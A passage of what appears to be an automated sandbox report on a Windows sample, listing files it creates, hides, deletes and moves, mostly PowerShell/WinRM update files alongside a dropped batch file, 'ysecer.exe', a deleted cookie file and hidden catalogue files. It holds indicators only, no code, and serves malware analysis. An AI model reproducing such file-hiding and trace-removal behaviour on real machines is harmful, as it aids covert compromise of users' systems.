  • D:\f6aa1af8feadf402f6eb6457618ba2\about_profiles.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_preference_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pipelines.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_path_syntax.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_parsing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_parameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssessions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_objects.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_methods.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_logical_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_locations.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_line_editing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_language_keywords.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_join.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_jobs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_job_details.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_if.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_history.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_hash_tables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_modules.help.txt
  • <SYSTEM32>\set14.tmp
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_type_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_redirection.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_try_catch_finally.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_trap.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_transactions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_throw.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_switch.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_split.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_special_characters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_signing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_session_configurations.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_scripts.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_script_internationalization.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_types.ps1xml.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_script_blocks.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_return.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_reserved_words.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_requires.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_troubleshooting.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_requirements.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_output.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_jobs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_faq.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_regular_expressions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_ref.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssnapins.help.txt
  • <LS_APPDATA>\f4593d9\114bff7.bat
Sets the 'hidden' attribute to the following files
  • <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\oem0.cat
  • <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\kb968930xp.cat
Deletes the following files
  • %HOMEPATH%\cookies\user@bing[2].txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_comment_based_help.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_command_syntax.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_command_precedence.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_break.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_bits_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_automatic_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_assignment_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_arrays.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_arithmetic_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_aliases.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_continue.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\importallmodules.psd1
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_commonparameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsman.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\registry.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershelltrace.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershellcore.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\help.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\getevent.types.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\filesystem.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\dotnettypes.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\diagnostics.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\certificate.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\bitstransfer.format.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\bitstransfer.psd1
  • D:\f6aa1af8feadf402f6eb6457618ba2\profile.ps1
  • D:\f6aa1af8feadf402f6eb6457618ba2\types.ps1xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_comparison_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_core_commands.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_data_sections.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_modules.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_methods.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_logical_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_locations.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_line_editing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_language_keywords.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_join.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_jobs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_job_details.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_if.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_history.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_hash_tables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced_parameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced_methods.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_advanced.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_format.ps1xml.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_foreach.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_for.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_execution_policies.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_eventlogs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_escape_characters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_environment_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_do.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_functions_cmdletbindingattribute.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_debuggers.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_parameters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_objects.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell.exe.mui
  • D:\f6aa1af8feadf402f6eb6457618ba2\wtrinstaller.ico
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.graphicalhost.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.graphicalhost.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.gpowershell.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.gpowershell.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.editor.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.editor.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.runtime.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.interop.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\compiledcomposition.microsoft.powershell.gpowershell.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.cmd
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowspowershellhelp.chm
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowsremoteshell.adm
  • D:\f6aa1af8feadf402f6eb6457618ba2\windowsremotemanagement.adm
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell_ise.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshmsg.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_switch.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmprovhost.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmanhttpconfig.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrshost.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrs.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\spupdsvc.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\spuninst.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\pssetupnativeutils.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\pscustomsetuputil.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell_ise.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\powershell.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmwmipl.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmsvc.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmres.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmplpxy.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmauto.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrssrv.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrsmgr.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrscmd.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrmprov.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wevtfwd.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\spmsg.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshsip.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\pwrshplugin.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmauto.mof
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.ini
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrmprov.mof
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_parsing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_path_syntax.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pipelines.help.txt
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.management.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.utility.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.utility.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.security.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.security.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.diagnostics.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.diagnostics.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.runtime.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.management.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.wsman.management.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.consolehost.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.backgroundintelligenttransfer.management.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.commands.management.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.graphicalhost.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.editor.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.editor.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.gpowershell.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.gpowershell.resources.dll
  • %ALLUSERSPROFILE%\start menu\programs\accessories\windows powershell\@.lnk
  • %WINDIR%\imsins.bak
  • %WINDIR%\seccf.tmp
  • %WINDIR%\inf\oem0.inf
  • %WINDIR%\inf\oem0.pnf
  • <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\oem0.cat
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.backgroundintelligenttransfer.management.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\system.management.automation.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.graphicalhost.resources.dll
  • <SYSTEM32>\windowspowershell\v1.0\system.management.automation.dll
  • %TEMP%\tmpce.tmp
  • %WINDIR%\_000002_.tmp.dll
  • <SYSTEM32>\wsmpty.xsl
  • <SYSTEM32>\wsmtxt.xsl
  • <SYSTEM32>\winrm.cmd
  • <SYSTEM32>\winrm.vbs
  • <SYSTEM32>\wsmauto.dll
  • <SYSTEM32>\wsmsvc.dll
  • <SYSTEM32>\wsmwmipl.dll
  • <SYSTEM32>\wsmres.dll
  • <SYSTEM32>\winrs.exe
  • <SYSTEM32>\winrshost.exe
  • <SYSTEM32>\winrscmd.dll
  • <SYSTEM32>\winrsmgr.dll
  • <SYSTEM32>\wbem\wsmauto.mof
  • <SYSTEM32>\winrssrv.dll
  • <SYSTEM32>\wsmplpxy.dll
  • <SYSTEM32>\winrmprov.dll
  • <SYSTEM32>\winrmprov.mof
  • <SYSTEM32>\wsmprovhost.exe
  • <SYSTEM32>\wevtfwd.dll
  • %WINDIR%\inf\windowsremotemanagement.adm
  • %WINDIR%\inf\windowsremoteshell.adm
  • <SYSTEM32>\grouppolicy\adm\windowsremotemanagement.adm
  • <SYSTEM32>\grouppolicy\adm\windowsremoteshell.adm
  • <SYSTEM32>\grouppolicy\adm\eventforwarding.adm
  • <SYSTEM32>\winrm\0409\winrm.ini
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.ver
  • <SYSTEM32>\wsmanhttpconfig.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\eula.txt
  • <SYSTEM32>\windowspowershell\v1.0\microsoft.powershell.consolehost.resources.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.inf
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_signing.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_scripts.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_script_internationalization.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_script_blocks.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_scopes.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_return.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_reserved_words.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_requires.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_troubleshooting.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_requirements.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_output.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_jobs.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote_faq.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_remote.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_regular_expressions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_ref.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_redirection.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_quoting_rules.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssnapins.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssessions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_pssession_details.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_providers.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_properties.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_prompts.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_profiles.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_preference_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_special_characters.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\update.exe
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_session_configurations.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\pspluginwkr.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\eventforwarding.adm
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_throw.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\spcustom.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\kb968930xp.cat
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmtxt.xsl
  • D:\f6aa1af8feadf402f6eb6457618ba2\wsmpty.xsl
  • D:\f6aa1af8feadf402f6eb6457618ba2\system.management.automation.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.wsman.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.security.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.consolehost.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.utility.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.powershell.commands.diagnostics.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\microsoft.backgroundintelligenttransfer.management.dll-help.xml
  • D:\f6aa1af8feadf402f6eb6457618ba2\update\updspapi.dll
  • D:\f6aa1af8feadf402f6eb6457618ba2\winrm.vbs
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_ws-management_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_wmi_cmdlets.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_windows_powershell_ise.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_windows_powershell_2.0.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_wildcards.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_while.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_variables.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_types.ps1xml.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_type_operators.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_try_catch_finally.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_trap.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_transactions.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\default.help.txt
  • D:\f6aa1af8feadf402f6eb6457618ba2\about_split.help.txt
  • <LS_APPDATA>\ysecer\ysecer.exe
Moves the following system files
  • from <SYSTEM32>\catroot2\edb00001.log to <SYSTEM32>\catroot2\edbtmp.log
  • from <SYSTEM32>\catroot2\edb.log to <SYSTEM32>\catroot2\edb0001a.log
Moves the following files
  • from %WINDIR%\kb968930xp.cat to %WINDIR%\_000002_.tmp.dll
  • from <SYSTEM32>\windowspowershell\v1.0\set91.tmp to <SYSTEM32>\windowspowershell\v1.0\about_prompts.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set92.tmp to <SYSTEM32>\windowspowershell\v1.0\about_properties.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set93.tmp to <SYSTEM32>\windowspowershell\v1.0\about_providers.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set94.tmp to <SYSTEM32>\windowspowershell\v1.0\about_pssessions.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set95.tmp to <SYSTEM32>\windowspowershell\v1.0\about_pssession_details.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set96.tmp to <SYSTEM32>\windowspowershell\v1.0\about_pssnapins.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8e.tmp to <SYSTEM32>\windowspowershell\v1.0\about_pipelines.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set97.tmp to <SYSTEM32>\windowspowershell\v1.0\about_quoting_rules.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set90.tmp to <SYSTEM32>\windowspowershell\v1.0\about_profiles.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set99.tmp to <SYSTEM32>\windowspowershell\v1.0\about_ref.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9b.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9c.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote_faq.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9d.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote_jobs.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9e.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote_output.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9f.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote_requirements.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta0.tmp to <SYSTEM32>\windowspowershell\v1.0\about_remote_troubleshooting.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set98.tmp to <SYSTEM32>\windowspowershell\v1.0\about_redirection.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta1.tmp to <SYSTEM32>\windowspowershell\v1.0\about_requires.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set9a.tmp to <SYSTEM32>\windowspowershell\v1.0\about_regular_expressions.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8f.tmp to <SYSTEM32>\windowspowershell\v1.0\about_preference_variables.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8d.tmp to <SYSTEM32>\windowspowershell\v1.0\about_path_syntax.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8c.tmp to <SYSTEM32>\windowspowershell\v1.0\about_parsing.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7a.tmp to <SYSTEM32>\windowspowershell\v1.0\about_functions_advanced_methods.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7b.tmp to <SYSTEM32>\windowspowershell\v1.0\about_functions_advanced_parameters.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7c.tmp to <SYSTEM32>\windowspowershell\v1.0\about_functions_cmdletbindingattribute.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7d.tmp to <SYSTEM32>\windowspowershell\v1.0\about_hash_tables.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7e.tmp to <SYSTEM32>\windowspowershell\v1.0\about_history.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set7f.tmp to <SYSTEM32>\windowspowershell\v1.0\about_if.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set80.tmp to <SYSTEM32>\windowspowershell\v1.0\about_jobs.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set78.tmp to <SYSTEM32>\windowspowershell\v1.0\about_functions.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set81.tmp to <SYSTEM32>\windowspowershell\v1.0\about_job_details.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set83.tmp to <SYSTEM32>\windowspowershell\v1.0\about_language_keywords.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set84.tmp to <SYSTEM32>\windowspowershell\v1.0\about_line_editing.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set85.tmp to <SYSTEM32>\windowspowershell\v1.0\about_locations.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set86.tmp to <SYSTEM32>\windowspowershell\v1.0\about_logical_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set87.tmp to <SYSTEM32>\windowspowershell\v1.0\about_methods.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set88.tmp to <SYSTEM32>\windowspowershell\v1.0\about_modules.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set89.tmp to <SYSTEM32>\windowspowershell\v1.0\about_objects.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8a.tmp to <SYSTEM32>\windowspowershell\v1.0\about_operators.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set82.tmp to <SYSTEM32>\windowspowershell\v1.0\about_join.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set8b.tmp to <SYSTEM32>\windowspowershell\v1.0\about_parameters.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set77.tmp to <SYSTEM32>\windowspowershell\v1.0\about_format.ps1xml.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\set79.tmp to <SYSTEM32>\windowspowershell\v1.0\about_functions_advanced.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta2.tmp to <SYSTEM32>\windowspowershell\v1.0\about_reserved_words.help.txt
  • from <SYSTEM32>\windowspowershell\v1.0\seta6.tmp to <SYSTEM32>\windowspowershell\v1.0\about_script_blocks.help.txt
  • from %WINDIR%\$968930uinstall_kb968930$\setbd.tmp to %WINDIR%\$968930uinstall_kb968930$\pssetupnativeutils.exe
  • from <SYSTEM32>\setbe.tmp to <SYSTEM32>\pwrshplugin.dll
  • from <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setbf.tmp to <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\bitstransfer.psd1
  • from <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setc0.tmp to <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\bitstransfer.format.ps1xml
  • from <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\setc1.tmp to <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
  • from <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\setc2.tmp to <SYSTEM32>\windowspowershell\v1.0\modules\bitstransfer\en\microsoft.backgroundintelligenttransfer.management.dll-help.xml
